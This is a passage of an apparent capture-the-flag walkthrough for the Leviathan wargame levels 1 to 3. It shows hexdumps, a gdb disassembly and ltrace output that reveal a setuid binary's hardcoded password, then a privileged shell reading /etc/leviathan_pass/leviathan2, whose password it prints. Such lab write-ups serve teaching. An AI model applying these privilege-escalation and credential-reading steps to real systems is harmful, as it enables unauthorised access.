00001930  7c 01 00 00 00 00 00 00  00 00 00 00 12 00 00 00  ||...............|
00001940  8e 01 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |................|
00001950  a1 01 00 00 34 a0 04 08  00 00 00 00 10 00 18 00  |....4...........|
00001960  a8 01 00 00 64 86 04 08  00 00 00 00 12 00 0e 00  |....d...........|
00001970  ae 01 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |................|
00001980  ca 01 00 00 2c a0 04 08  00 00 00 00 10 00 18 00  |....,...........|
00001990  d7 01 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |................|
000019a0  e7 01 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |................|
000019b0  f9 01 00 00 00 00 00 00  00 00 00 00 20 00 00 00  |............ ...|
000019c0  08 02 00 00 30 a0 04 08  00 00 00 00 11 02 18 00  |....0...........|
000019d0  15 02 00 00 7c 86 04 08  04 00 00 00 11 00 0f 00  |....|...........|
000019e0  24 02 00 00 00 00 00 00  00 00 00 00 12 00 00 00  |$...............|
000019f0  41 02 00 00 f0 85 04 08  61 00 00 00 12 00 0d 00  |A.......a.......|
00001a00  51 02 00 00 38 a0 04 08  00 00 00 00 10 00 19 00  |Q...8...........|
00001a10  56 02 00 00 30 84 04 08  00 00 00 00 12 00 0d 00  |V...0...........|
00001a20  5d 02 00 00 78 86 04 08  04 00 00 00 11 00 0f 00  |]...x...........|
00001a30  64 02 00 00 34 a0 04 08  00 00 00 00 10 00 19 00  |d...4...........|
00001a40  70 02 00 00 2d 85 04 08  bd 00 00 00 12 00 0d 00  |p...-...........|
00001a50  75 02 00 00 00 00 00 00  00 00 00 00 20 00 00 00  |u........... ...|
00001a60  89 02 00 00 34 a0 04 08  00 00 00 00 11 02 18 00  |....4...........|
00001a70  95 02 00 00 00 00 00 00  00 00 00 00 20 00 00 00  |............ ...|
00001a80  af 02 00 00 7c 83 04 08  00 00 00 00 12 00 0b 00  |....|...........|
00001a90  00 63 72 74 73 74 75 66  66 2e 63 00 5f 5f 4a 43  |.crtstuff.c.__JC|
00001aa0  52 5f 4c 49 53 54 5f 5f  00 64 65 72 65 67 69 73  |R_LIST__.deregis|
00001ab0  74 65 72 5f 74 6d 5f 63  6c 6f 6e 65 73 00 72 65  |ter_tm_clones.re|
00001ac0  67 69 73 74 65 72 5f 74  6d 5f 63 6c 6f 6e 65 73  |gister_tm_clones|
00001ad0  00 5f 5f 64 6f 5f 67 6c  6f 62 61 6c 5f 64 74 6f  |.__do_global_dto|
00001ae0  72 73 5f 61 75 78 00 63  6f 6d 70 6c 65 74 65 64  |rs_aux.completed|
00001af0  2e 36 35 39 30 00 5f 5f  64 6f 5f 67 6c 6f 62 61  |.6590.__do_globa|
00001b00  6c 5f 64 74 6f 72 73 5f  61 75 78 5f 66 69 6e 69  |l_dtors_aux_fini|
00001b10  5f 61 72 72 61 79 5f 65  6e 74 72 79 00 66 72 61  |_array_entry.fra|
00001b20  6d 65 5f 64 75 6d 6d 79  00 5f 5f 66 72 61 6d 65  |me_dummy.__frame|
00001b30  5f 64 75 6d 6d 79 5f 69  6e 69 74 5f 61 72 72 61  |_dummy_init_arra|
00001b40  79 5f 65 6e 74 72 79 00  63 68 65 63 6b 2e 63 00  |y_entry.check.c.|
00001b50  5f 5f 46 52 41 4d 45 5f  45 4e 44 5f 5f 00 5f 5f  |__FRAME_END__.__|
00001b60  4a 43 52 5f 45 4e 44 5f  5f 00 5f 5f 69 6e 69 74  |JCR_END__.__init|
00001b70  5f 61 72 72 61 79 5f 65  6e 64 00 5f 44 59 4e 41  |_array_end._DYNA|
00001b80  4d 49 43 00 5f 5f 69 6e  69 74 5f 61 72 72 61 79  |MIC.__init_array|
00001b90  5f 73 74 61 72 74 00 5f  47 4c 4f 42 41 4c 5f 4f  |_start._GLOBAL_O|
00001ba0  46 46 53 45 54 5f 54 41  42 4c 45 5f 00 5f 5f 6c  |FFSET_TABLE_.__l|
00001bb0  69 62 63 5f 63 73 75 5f  66 69 6e 69 00 73 74 72  |ibc_csu_fini.str|
00001bc0  63 6d 70 40 40 47 4c 49  42 43 5f 32 2e 30 00 5f  |cmp@@GLIBC_2.0._|
00001bd0  49 54 4d 5f 64 65 72 65  67 69 73 74 65 72 54 4d  |ITM_deregisterTM|
00001be0  43 6c 6f 6e 65 54 61 62  6c 65 00 5f 5f 78 38 36  |CloneTable.__x86|
00001bf0  2e 67 65 74 5f 70 63 5f  74 68 75 6e 6b 2e 62 78  |.get_pc_thunk.bx|
00001c00  00 64 61 74 61 5f 73 74  61 72 74 00 70 72 69 6e  |.data_start.prin|
00001c10  74 66 40 40 47 4c 49 42  43 5f 32 2e 30 00 67 65  |tf@@GLIBC_2.0.ge|
00001c20  74 63 68 61 72 40 40 47  4c 49 42 43 5f 32 2e 30  |tchar@@GLIBC_2.0|
00001c30  00 5f 65 64 61 74 61 00  5f 66 69 6e 69 00 5f 5f  |._edata._fini.__|
00001c40  73 74 61 63 6b 5f 63 68  6b 5f 66 61 69 6c 40 40  |stack_chk_fail@@|
00001c50  47 4c 49 42 43 5f 32 2e  34 00 5f 5f 64 61 74 61  |GLIBC_2.4.__data|
00001c60  5f 73 74 61 72 74 00 70  75 74 73 40 40 47 4c 49  |_start.puts@@GLI|
00001c70  42 43 5f 32 2e 30 00 73  79 73 74 65 6d 40 40 47  |BC_2.0.system@@G|
00001c80  4c 49 42 43 5f 32 2e 30  00 5f 5f 67 6d 6f 6e 5f  |LIBC_2.0.__gmon_|
00001c90  73 74 61 72 74 5f 5f 00  5f 5f 64 73 6f 5f 68 61  |start__.__dso_ha|
00001ca0  6e 64 6c 65 00 5f 49 4f  5f 73 74 64 69 6e 5f 75  |ndle._IO_stdin_u|
00001cb0  73 65 64 00 5f 5f 6c 69  62 63 5f 73 74 61 72 74  |sed.__libc_start|
00001cc0  5f 6d 61 69 6e 40 40 47  4c 49 42 43 5f 32 2e 30  |_main@@GLIBC_2.0|
00001cd0  00 5f 5f 6c 69 62 63 5f  63 73 75 5f 69 6e 69 74  |.__libc_csu_init|
00001ce0  00 5f 65 6e 64 00 5f 73  74 61 72 74 00 5f 66 70  |._end._start._fp|
00001cf0  5f 68 77 00 5f 5f 62 73  73 5f 73 74 61 72 74 00  |_hw.__bss_start.|
00001d00  6d 61 69 6e 00 5f 4a 76  5f 52 65 67 69 73 74 65  |main._Jv_Registe|
00001d10  72 43 6c 61 73 73 65 73  00 5f 5f 54 4d 43 5f 45  |rClasses.__TMC_E|
00001d20  4e 44 5f 5f 00 5f 49 54  4d 5f 72 65 67 69 73 74  |ND__._ITM_regist|
00001d30  65 72 54 4d 43 6c 6f 6e  65 54 61 62 6c 65 00 5f  |erTMCloneTable._|
00001d40  69 6e 69 74 00                                    |init.|
00001d45
leviathan1@melinda:~$
leviathan1@melinda:~$ gdb ./check -q
Reading symbols from ./check...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
   0x0804852d <+0>:     push   ebp
   0x0804852e <+1>:     mov    ebp,esp
   0x08048530 <+3>:     and    esp,0xfffffff0
   0x08048533 <+6>:     sub    esp,0x30
   0x08048536 <+9>:     mov    eax,gs:0x14
   0x0804853c <+15>:    mov    DWORD PTR [esp+0x2c],eax
   0x08048540 <+19>:    xor    eax,eax
   0x08048542 <+21>:    mov    DWORD PTR [esp+0x18],0x786573
   0x0804854a <+29>:    mov    DWORD PTR [esp+0x25],0x72636573
   0x08048552 <+37>:    mov    WORD PTR [esp+0x29],0x7465
   0x08048559 <+44>:    mov    BYTE PTR [esp+0x2b],0x0
   0x0804855e <+49>:    mov    DWORD PTR [esp+0x1c],0x646f67
   0x08048566 <+57>:    mov    DWORD PTR [esp+0x20],0x65766f6c
   0x0804856e <+65>:    mov    BYTE PTR [esp+0x24],0x0
   0x08048573 <+70>:    mov    DWORD PTR [esp],0x8048680
   0x0804857a <+77>:    call   0x80483c0 <printf@plt>
   0x0804857f <+82>:    call   0x80483d0 <getchar@plt>
   0x08048584 <+87>:    mov    BYTE PTR [esp+0x14],al
   0x08048588 <+91>:    call   0x80483d0 <getchar@plt>
   0x0804858d <+96>:    mov    BYTE PTR [esp+0x15],al
   0x08048591 <+100>:   call   0x80483d0 <getchar@plt>
   0x08048596 <+105>:   mov    BYTE PTR [esp+0x16],al
   0x0804859a <+109>:   mov    BYTE PTR [esp+0x17],0x0
   0x0804859f <+114>:   lea    eax,[esp+0x18]
   0x080485a3 <+118>:   mov    DWORD PTR [esp+0x4],eax
   0x080485a7 <+122>:   lea    eax,[esp+0x14]
   0x080485ab <+126>:   mov    DWORD PTR [esp],eax
   0x080485ae <+129>:   call   0x80483b0 <strcmp@plt>
   0x080485b3 <+134>:   test   eax,eax
   0x080485b5 <+136>:   jne    0x80485c5 <main+152>
   0x080485b7 <+138>:   mov    DWORD PTR [esp],0x804868b
   0x080485be <+145>:   call   0x8048400 <system@plt>
   0x080485c3 <+150>:   jmp    0x80485d1 <main+164>
   0x080485c5 <+152>:   mov    DWORD PTR [esp],0x8048693
   0x080485cc <+159>:   call   0x80483f0 <puts@plt>
   0x080485d1 <+164>:   mov    eax,0x0
   0x080485d6 <+169>:   mov    edx,DWORD PTR [esp+0x2c]
   0x080485da <+173>:   xor    edx,DWORD PTR gs:0x14
   0x080485e1 <+180>:   je     0x80485e8 <main+187>
   0x080485e3 <+182>:   call   0x80483e0 <__stack_chk_fail@plt>
   0x080485e8 <+187>:   leave
   0x080485e9 <+188>:   ret
End of assembler dump.
(gdb) quit
leviathan1@melinda:~$
leviathan1@melinda:~$ ltrace ./check
__libc_start_main(0x804852d, 1, 0xffffd7a4, 0x80485f0 <unfinished ...>
printf("password: ")                                                                                                                               = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642password: test
)                                                                                                       = 116
getchar(0x8048680, 47, 0x804a000, 0x8048642)                                                                                                       = 101
getchar(0x8048680, 47, 0x804a000, 0x8048642)                                                                                                       = 115
strcmp("tes", "sex")                                                                                                                               = 1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                                                                                                               = 29
+++ exited (status 0) +++
leviathan1@melinda:~$
leviathan1@melinda:~$ ./check
password: sex
$ id
uid=12001(leviathan1) gid=12001(leviathan1) euid=12002(leviathan2) groups=12002(leviathan2),12001(leviathan1)
$ whoami
leviathan2
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta
$

Leviathan Level 2 → Level 3
Login -> leviathan2
Password -> ougahZi8Ta
leviathan2@melinda:~$ ls -lah
total 28K
drwxr-xr-x   2 root       root       4.0K Nov 14  2014 .
drwxr-xr-x 167 root       root       4.0K Jul  9  2015 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3.6K Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan3 leviathan2 7.4K Nov 14  2014 printfile
leviathan2@melinda:~$ ./printfile
*** File Printer ***
Usage: ./printfile filename
leviathan2@melinda:~$ file printfile
printfile: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=d765b4023e214e3fbfe71aa63554713a57e39520, not stripped
leviathan2@melinda:~$
leviathan2@melinda:~$ hexdump -C printfile
00000000  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00000010  02 00 03 00 01 00 00 00  30 84 04 08 34 00 00 00  |........0...4...|
00000020  60 11 00 00 00 00 00 00  34 00 20 00 09 00 28 00  |`.......4. ...(.|
00000030  1e 00 1b 00 06 00 00 00  34 00 00 00 34 80 04 08  |........4...4...|
00000040  34 80 04 08 20 01 00 00  20 01 00 00 05 00 00 00  |4... ... .......|
00000050  04 00 00 00 03 00 00 00  54 01 00 00 54 81 04 08  |........T...T...|
00000060  54 81 04 08 13 00 00 00  13 00 00 00 04 00 00 00  |T...............|
00000070  01 00 00 00 01 00 00 00  00 00 00 00 00 80 04 08  |................|
00000080  00 80 04 08 bc 07 00 00  bc 07 00 00 05 00 00 00  |................|
00000090  00 10 00 00 01 00 00 00  08 0f 00 00 08 9f 04 08  |................|
000000a0  08 9f 04 08 2c 01 00 00  30 01 00 00 06 00 00 00  |....,...0.......|
000000b0  00 10 00 00 02 00 00 00  14 0f 00 00 14 9f 04 08  |................|
000000c0  14 9f 04 08 e8 00 00 00  e8 00 00 00 06 00 00 00  |................|
000000d0  04 00 00 00 04 00 00 00  68 01 00 00 68 81 04 08  |........h...h...|
000000e0  68 81 04 08 44 00 00 00  44 00 00 00 04 00 00 00  |h...D...D.......|
000000f0  04 00 00 00 50 e5 74 64  e0 06 00 00 e0 86 04 08  |....P.td........|
00000100  e0 86 04 08 2c 00 00 00  2c 00 00 00 04 00 00 00  |....,...,.......|
00000110  04 00 00 00 51 e5 74 64  00 00 00 00 00 00 00 00  |....Q.td........|
00000120  00 00 00 00 00 00 00 00  00 00 00 00 06 00 00 00  |................|
00000130  10 00 00 00 52 e5 74 64  08 0f 00 00 08 9f 04 08  |....R.td........|
00000140  08 9f 04 08 f8 00 00 00  f8 00 00 00 04 00 00 00  |................|
00000150  01 00 00 00 2f 6c 69 62  2f 6c 64 2d 6c 69 6e 75  |..../lib/ld-linu|
00000160  78 2e 73 6f 2e 32 00 00  04 00 00 00 10 00 00 00  |x.so.2..........|
00000170  01 00 00 00 47 4e 55 00  00 00 00 00 02 00 00 00  |....GNU.........|
00000180  06 00 00 00 18 00 00 00  04 00 00 00 14 00 00 00  |................|
00000190  03 00 00 00 47 4e 55 00  d7 65 b4 02 3e 21 4e 3f  |....GNU..e..>!N?|
000001a0  bf e7 1a a6 35 54 71 3a  57 e3 95 20 02 00 00 00  |....5Tq:W.. ....|
000001b0  09 00 00 00 01 00 00 00  05 00 00 00 00 20 00 20  |............. . |
000001c0  00 00 00 00 09 00 00 00  ad 4b e3 c0 00 00 00 00  |.........K......|
000001d0  00 00 00 00 00 00 00 00  00 00 00 00 52 00 00 00  |............R...|
000001e0  00 00 00 00 00 00 00 00  12 00 00 00 1f 00 00 00  |................|
000001f0  00 00 00 00 00 00 00 00  12 00 00 00 1a 00 00 00  |................|
00000200  00 00 00 00 00 00 00 00  12 00 00 00 30 00 00 00  |............0...|
00000210  00 00 00 00 00 00 00 00  12 00 00 00 59 00 00 00  |............Y...|
00000220  00 00 00 00 00 00 00 00  20 00 00 00 3e 00 00 00  |........ ...>...|
00000230  00 00 00 00 00 00 00 00  12 00 00 00 50 00 00 00  |............P...|
00000240  00 00 00 00 00 00 00 00  12 00 00 00 37 00 00 00  |............7...|
00000250  00 00 00 00 00 00 00 00  12 00 00 00 0b 00 00 00  |................|
00000260  8c 86 04 08 04 00 00 00  11 00 0f 00 00 6c 69 62  |.............lib|
00000270  63 2e 73 6f 2e 36 00 5f  49 4f 5f 73 74 64 69 6e  |c.so.6._IO_stdin|
00000280  5f 75 73 65 64 00 70 75  74 73 00 5f 5f 73 74 61  |_used.puts.__sta|
00000290  63 6b 5f 63 68 6b 5f 66  61 69 6c 00 73 79 73 74  |ck_chk_fail.syst|
000002a0  65 6d 00 61 63 63 65 73  73 00 5f 5f 6c 69 62 63  |em.access.__libc|
000002b0  5f 73 74 61 72 74 5f 6d  61 69 6e 00 73 6e 70 72  |_start_main.snpr|
000002c0  69 6e 74 66 00 5f 5f 67  6d 6f 6e 5f 73 74 61 72  |intf.__gmon_star|
000002d0  74 5f 5f 00 47 4c 49 42  43 5f 32 2e 34 00 47 4c  |t__.GLIBC_2.4.GL|
000002e0  49 42 43 5f 32 2e 30 00  00 00 02 00 03 00 02 00  |IBC_2.0.........|
000002f0  02 00 00 00 02 00 02 00  02 00 01 00 01 00 02 00  |................|
00000300  01 00 00 00 10 00 00 00  00 00 00 00 14 69 69 0d  |.............ii.|
00000310  00 00 03 00 68 00 00 00  10 00 00 00 10 69 69 0d  |....h........ii.|
00000320  00 00 02 00 72 00 00 00  00 00 00 00 fc 9f 04 08  |....r...........|
00000330  06 05 00 00 0c a0 04 08  07 01 00 00 10 a0 04 08  |................|
00000340  07 02 00 00 14 a0 04 08  07 03 00 00 18 a0 04 08  |................|
00000350  07 04 00 00 1c a0 04 08  07 05 00 00 20 a0 04 08  |............ ...|
00000360  07 06 00 00 24 a0 04 08  07 07 00 00 28 a0 04 08  |....$.......(...|
00000370  07 08 00 00 53 83 ec 08  e8 e3 00 00 00 81 c3 83  |....S...........|
00000380  1c 00 00 8b 83 fc ff ff  ff 85 c0 74 05 e8 5e 00  |...........t..^.|
00000390  00 00 83 c4 08 5b c3 00  00 00 00 00 00 00 00 00  |.....[..........|
000003a0  ff 35 04 a0 04 08 ff 25  08 a0 04 08 00 00 00 00  |.5.....%........|
000003b0  ff 25 0c a0 04 08 68 00  00 00 00 e9 e0 ff ff ff  |.%....h.........|
000003c0  ff 25 10 a0 04 08 68 08  00 00 00 e9 d0 ff ff ff  |.%....h.........|
000003d0  ff 25 14 a0 04 08 68 10  00 00 00 e9 c0 ff ff ff  |.%....h.........|
000003e0  ff 25 18 a0 04 08 68 18  00 00 00 e9 b0 ff ff ff  |.%....h.........|
000003f0  ff 25 1c a0 04 08 68 20  00 00 00 e9 a0 ff ff ff  |.%....h ........|
00000400  ff 25 20 a0 04 08 68 28  00 00 00 e9 90 ff ff ff  |.% ...h(........|
00000410  ff 25 24 a0 04 08 68 30  00 00 00 e9 80 ff ff ff  |.%$...h0........|
00000420  ff 25 28 a0 04 08 68 38  00 00 00 e9 70 ff ff ff  |.%(...h8....p...|
00000430  31 ed 5e 89 e1 83 e4 f0  50 54 52 68 70 86 04 08  |1.^.....PTRhp...|
00000440  68 00 86 04 08 51 56 68  2d 85 04 08 e8 af ff ff  |h....QVh-.......|
00000450  ff f4 66 90 66 90 66 90  66 90 66 90 66 90 66 90  |..f.f.f.f.f.f.f.|
00000460  8b 1c 24 c3 66 90 66 90  66 90 66 90 66 90 66 90  |..$.f.f.f.f.f.f.|
00000470  b8 37 a0 04 08 2d 34 a0  04 08 83 f8 06 77 01 c3  |.7...-4......w..|
00000480  b8 00 00 00 00 85 c0 74  f6 55 89 e5 83 ec 18 c7  |.......t.U......|
00000490  04 24 34 a0 04 08 ff d0  c9 c3 8d b6 00 00 00 00  |.$4.............|
000004a0  b8 34 a0 04 08 2d 34 a0  04 08 c1 f8 02 89 c2 c1  |.4...-4.........|
000004b0  ea 1f 01 d0 d1 f8 75 01  c3 ba 00 00 00 00 85 d2  |......u.........|
000004c0  74 f6 55 89 e5 83 ec 18  89 44 24 04 c7 04 24 34  |t.U......D$...$4|
000004d0  a0 04 08 ff d2 c9 c3 89  f6 8d bc 27 00 00 00 00  |...........'....|
000004e0  80 3d 34 a0 04 08 00 75  13 55 89 e5 83 ec 08 e8  |.=4....u.U......|
000004f0  7c ff ff ff c6 05 34 a0  04 08 01 c9 f3 c3 66 90  ||.....4.......f.|
00000500  a1 10 9f 04 08 85 c0 74  1f b8 00 00 00 00 85 c0  |.......t........|
00000510  74 16 55 89 e5 83 ec 18  c7 04 24 10 9f 04 08 ff  |t.U.......$.....|
00000520  d0 c9 e9 79 ff ff ff 90  e9 73 ff ff ff 55 89 e5  |...y.....s...U..|
00000530  83 e4 f0 81 ec 30 02 00  00 8b 45 0c 89 44 24 1c  |.....0....E..D$.|
00000540  65 a1 14 00 00 00 89 84  24 2c 02 00 00 31 c0 83  |e.......$,...1..|
00000550  7d 08 01 7f 29 c7 04 24  90 86 04 08 e8 6f fe ff  |}...)..$.....o..|
00000560  ff 8b 44 24 1c 8b 00 89  44 24 04 c7 04 24 a5 86  |..D$....D$...$..|
00000570  04 08 e8 39 fe ff ff b8  ff ff ff ff eb 6a 8b 44  |...9.........j.D|
00000580  24 1c 83 c0 04 8b 00 c7  44 24 04 04 00 00 00 89  |$.......D$......|
00000590  04 24 e8 89 fe ff ff 85  c0 74 13 c7 04 24 b9 86  |.$.......t...$..|
000005a0  04 08 e8 29 fe ff ff b8  01 00 00 00 eb 3a 8b 44  |...).........:.D|
000005b0  24 1c 83 c0 04 8b 00 89  44 24 0c c7 44 24 08 d4  |$.......D$..D$..|
000005c0  86 04 08 c7 44 24 04 ff  01 00 00 8d 44 24 2c 89  |....D$......D$,.|
000005d0  04 24 e8 39 fe ff ff 8d  44 24 2c 89 04 24 e8 fd  |.$.9....D$,..$..|
000005e0  fd ff ff b8 00 00 00 00  8b 94 24 2c 02 00 00 65  |..........$,...e|
000005f0  33 15 14 00 00 00 74 05  e8 c3 fd ff ff c9 c3 90  |3.....t.........|
00000600  55 57 31 ff 56 53 e8 55  fe ff ff 81 c3 f5 19 00  |UW1.VS.U........|
00000610  00 83 ec 1c 8b 6c 24 30  8d b3 0c ff ff ff e8 51  |.....l$0.......Q|
00000620  fd ff ff 8d 83 08 ff ff  ff 29 c6 c1 fe 02 85 f6  |.........)......|
00000630  74 27 8d b6 00 00 00 00  8b 44 24 38 89 2c 24 89  |t'.......D$8.,$.|
00000640  44 24 08 8b 44 24 34 89  44 24 04 ff 94 bb 08 ff  |D$..D$4.D$......|
00000650  ff ff 83 c7 01 39 f7 75  df 83 c4 1c 5b 5e 5f 5d  |.....9.u....[^_]|
00000660  c3 eb 0d 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000670  f3 c3 00 00 53 83 ec 08  e8 e3 fd ff ff 81 c3 83  |....S...........|
00000680  19 00 00 83 c4 08 5b c3  03 00 00 00 01 00 02 00  |......[.........|
00000690  2a 2a 2a 20 46 69 6c 65  20 50 72 69 6e 74 65 72  |*** File Printer|
000006a0  20 2a 2a 2a 00 55 73 61  67 65 3a 20 25 73 20 66  | ***.Usage: %s f|
000006b0  69 6c 65 6e 61 6d 65 0a  00 59 6f 75 20 63 61 6e  |ilename..You can|
000006c0  74 20 68 61 76 65 20 74  68 61 74 20 66 69 6c 65  |t have that file|
000006d0  2e 2e 2e 00 2f 62 69 6e  2f 63 61 74 20 25 73 00  |..../bin/cat %s.|
000006e0  01 1b 03 3b 28 00 00 00  04 00 00 00 c0 fc ff ff  |...;(...........|
000006f0  44 00 00 00 4d fe ff ff  68 00 00 00 20 ff ff ff  |D...M...h... ...|
00000700  88 00 00 00 90 ff ff ff  c4 00 00 00 14 00 00 00  |................|
00000710  00 00 00 00 01 7a 52 00  01 7c 08 01 1b 0c 04 04  |.....zR..|......|
00000720  88 01 00 00 20 00 00 00  1c 00 00 00 74 fc ff ff  |.... .......t...|
00000730  90 00 00 00 00 0e 08 46  0e 0c 4a 0f 0b 74 04 78  |.......F..J..t.x|
00000740  00 3f 1a 3b 2a 32 24 22  1c 00 00 00 40 00 00 00  |.?.;*2$"....@...|
00000750  dd fd ff ff d2 00 00 00  00 41 0e 08 85 02 42 0d  |.........A....B.|
00000760  05 02 ce c5 0c 04 04 00  38 00 00 00 60 00 00 00  |........8...`...|
00000770  90 fe ff ff 61 00 00 00  00 41 0e 08 85 02 41 0e  |....a....A....A.|
00000780  0c 87 03 43 0e 10 86 04  41 0e 14 83 05 4e 0e 30  |...C....A....N.0|
00000790  02 48 0e 14 41 c3 0e 10  41 c6 0e 0c 41 c7 0e 08  |.H..A...A...A...|
000007a0  41 c5 0e 04 10 00 00 00  9c 00 00 00 c4 fe ff ff  |A...............|
000007b0  02 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000007c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000f00  00 00 00 00 00 00 00 00  00 85 04 08 e0 84 04 08  |................|
00000f10  00 00 00 00 01 00 00 00  01 00 00 00 0c 00 00 00  |................|
00000f20  74 83 04 08 0d 00 00 00  74 86 04 08 19 00 00 00  |t.......t.......|
00000f30  08 9f 04 08 1b 00 00 00  04 00 00 00 1a 00 00 00  |................|
00000f40  0c 9f 04 08 1c 00 00 00  04 00 00 00 f5 fe ff 6f  |...............o|
00000f50  ac 81 04 08 05 00 00 00  6c 82 04 08 06 00 00 00  |........l.......|
00000f60  cc 81 04 08 0a 00 00 00  7c 00 00 00 0b 00 00 00  |........|.......|
00000f70  10 00 00 00 15 00 00 00  00 00 00 00 03 00 00 00  |................|
00000f80  00 a0 04 08 02 00 00 00  40 00 00 00 14 00 00 00  |........@.......|
00000f90  11 00 00 00 17 00 00 00  34 83 04 08 11 00 00 00  |........4.......|
00000fa0  2c 83 04 08 12 00 00 00  08 00 00 00 13 00 00 00  |,...............|
00000fb0  08 00 00 00 fe ff ff 6f  fc 82 04 08 ff ff ff 6f  |.......o.......o|
00000fc0  01 00 00 00 f0 ff ff 6f  e8 82 04 08 00 00 00 00  |.......o........|
00000fd0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000  14 9f 04 08 00 00 00 00  00 00 00 00 b6 83 04 08  |................|
00001010  c6 83 04 08 d6 83 04 08  e6 83 04 08 f6 83 04 08  |................|
00001020  06 84 04 08 16 84 04 08  26 84 04 08 00 00 00 00  |........&.......|
00001030  00 00 00 00 47 43 43 3a  20 28 55 62 75 6e 74 75  |....GCC: (Ubuntu|
00001040  20 34 2e 38 2e 32 2d 31  39 75 62 75 6e 74 75 31  | 4.8.2-19ubuntu1|
00001050  29 20 34 2e 38 2e 32 00  00 2e 73 79 6d 74 61 62  |) 4.8.2...symtab|
00001060  00 2e 73 74 72 74 61 62  00 2e 73 68 73 74 72 74  |..strtab..shstrt|
00001070  61 62 00 2e 69 6e 74 65  72 70 00 2e 6e 6f 74 65  |ab..interp..note|
00001080  2e 41 42 49 2d 74 61 67  00 2e 6e 6f 74 65 2e 67  |.ABI-tag..note.g|
00001090  6e 75 2e 62 75 69 6c 64  2d 69 64 00 2e 67 6e 75  |nu.build-id..gnu|
000010a0  2e 68 61 73 68 00 2e 64  79 6e 73 79 6d 00 2e 64  |.hash..dynsym..d|
000010b0  79 6e 73 74 72 00 2e 67  6e 75 2e 76 65 72 73 69  |ynstr..gnu.versi|
000010c0  6f 6e 00 2e 67 6e 75 2e  76 65 72 73 69 6f 6e 5f  |on..gnu.version_|
000010d0  72 00 2e 72 65 6c 2e 64  79 6e 00 2e 72 65 6c 2e  |r..rel.dyn..rel.|
000010e0  70 6c 74 00 2e 69 6e 69  74 00 2e 74 65 78 74 00  |plt..init..text.|
000010f0  2e 66 69 6e 69 00 2e 72  6f 64 61 74 61 00 2e 65  |.fini..rodata..e|
00001100  68 5f 66 72 61 6d 65 5f  68 64 72 00 2e 65 68 5f  |h_frame_hdr..eh_|
00001110  66 72 61 6d 65 00 2e 69  6e 69 74 5f 61 72 72 61  |frame..init_arra|
00001120  79 00 2e 66 69 6e 69 5f  61 72 72 61 79 00 2e 6a  |y..fini_array..j|
00001130  63 72 00 2e 64 79 6e 61  6d 69 63 00 2e 67 6f 74  |cr..dynamic..got|
00001140  00 2e 67 6f 74 2e 70 6c  74 00 2e 64 61 74 61 00  |..got.plt..data.|
00001150  2e 62 73 73 00 2e 63 6f  6d 6d 65 6e 74 00 00 00  |.bss..comment...|
00001160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001180  00 00 00 00 00 00 00 00  1b 00 00 00 01 00 00 00  |................|
00001190  02 00 00 00 54 81 04 08  54 01 00 00 13 00 00 00  |....T...T.......|
000011a0  00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  |................|
000011b0  23 00 00 00 07 00 00 00  02 00 00 00 68 81 04 08  |#...........h...|
000011c0  68 01 00 00 20 00 00 00  00 00 00 00 00 00 00 00  |h... ...........|
000011d0  04 00 00 00 00 00 00 00  31 00 00 00 07 00 00 00  |........1.......|
000011e0  02 00 00 00 88 81 04 08  88 01 00 00 24 00 00 00  |............$...|
000011f0  00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
00001200  44 00 00 00 f6 ff ff 6f  02 00 00 00 ac 81 04 08  |D......o........|
00001210  ac 01 00 00 20 00 00 00  05 00 00 00 00 00 00 00  |.... ...........|
00001220  04 00 00 00 04 00 00 00  4e 00 00 00 0b 00 00 00  |........N.......|
00001230  02 00 00 00 cc 81 04 08  cc 01 00 00 a0 00 00 00  |................|
00001240  06 00 00 00 01 00 00 00  04 00 00 00 10 00 00 00  |................|
00001250  56 00 00 00 03 00 00 00  02 00 00 00 6c 82 04 08  |V...........l...|
00001260  6c 02 00 00 7c 00 00 00  00 00 00 00 00 00 00 00  |l...|...........|
00001270  01 00 00 00 00 00 00 00  5e 00 00 00 ff ff ff 6f  |........^......o|
00001280  02 00 00 00 e8 82 04 08  e8 02 00 00 14 00 00 00  |................|
00001290  05 00 00 00 00 00 00 00  02 00 00 00 02 00 00 00  |................|
000012a0  6b 00 00 00 fe ff ff 6f  02 00 00 00 fc 82 04 08  |k......o........|
000012b0  fc 02 00 00 30 00 00 00  06 00 00 00 01 00 00 00  |....0...........|
000012c0  04 00 00 00 00 00 00 00  7a 00 00 00 09 00 00 00  |........z.......|
000012d0  02 00 00 00 2c 83 04 08  2c 03 00 00 08 00 00 00  |....,...,.......|
000012e0  05 00 00 00 00 00 00 00  04 00 00 00 08 00 00 00  |................|
000012f0  83 00 00 00 09 00 00 00  02 00 00 00 34 83 04 08  |............4...|
00001300  34 03 00 00 40 00 00 00  05 00 00 00 0c 00 00 00  |4...@...........|
00001310  04 00 00 00 08 00 00 00  8c 00 00 00 01 00 00 00  |................|
00001320  06 00 00 00 74 83 04 08  74 03 00 00 23 00 00 00  |....t...t...#...|
00001330  00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00  |................|
00001340  87 00 00 00 01 00 00 00  06 00 00 00 a0 83 04 08  |................|
00001350  a0 03 00 00 90 00 00 00  00 00 00 00 00 00 00 00  |................|
00001360  10 00 00 00 04 00 00 00  92 00 00 00 01 00 00 00  |................|
